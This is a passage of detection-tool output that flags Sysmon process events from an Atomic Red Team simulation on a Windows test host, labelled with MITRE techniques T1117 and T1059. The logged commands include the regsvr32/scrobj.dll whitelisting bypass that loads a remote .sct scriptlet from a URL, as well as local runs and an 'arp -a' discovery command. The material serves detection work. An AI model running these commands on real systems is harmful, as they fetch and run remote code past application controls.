<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:43.574378Z"">
</TimeCreated>
<EventRecordID>4036</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:43.460</Data>
<Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-0010771B3800</Data>
<Data Name=""ProcessId"">1476</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:43.445040Z"">
</TimeCreated>
<EventRecordID>4035</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:43.339</Data>
<Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-00100A0E3800</Data>
<Data Name=""ProcessId"">3848</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ParentProcessId"">2332</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
</TimeCreated>
<EventRecordID>4032</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ProcessId"">4444</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
</TimeCreated>
<EventRecordID>4032</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ProcessId"">4444</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.404357Z"">
</TimeCreated>
<EventRecordID>4031</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.384</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010D8D53700</Data>
<Data Name=""ProcessId"">6312</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.276408Z"">
</TimeCreated>
<EventRecordID>4029</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.259</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010DBCC3700</Data>
<Data Name=""ProcessId"">6292</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.061925Z"">
</TimeCreated>
<EventRecordID>4028</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.051</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-00104AC63700</Data>
<Data Name=""ProcessId"">6412</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
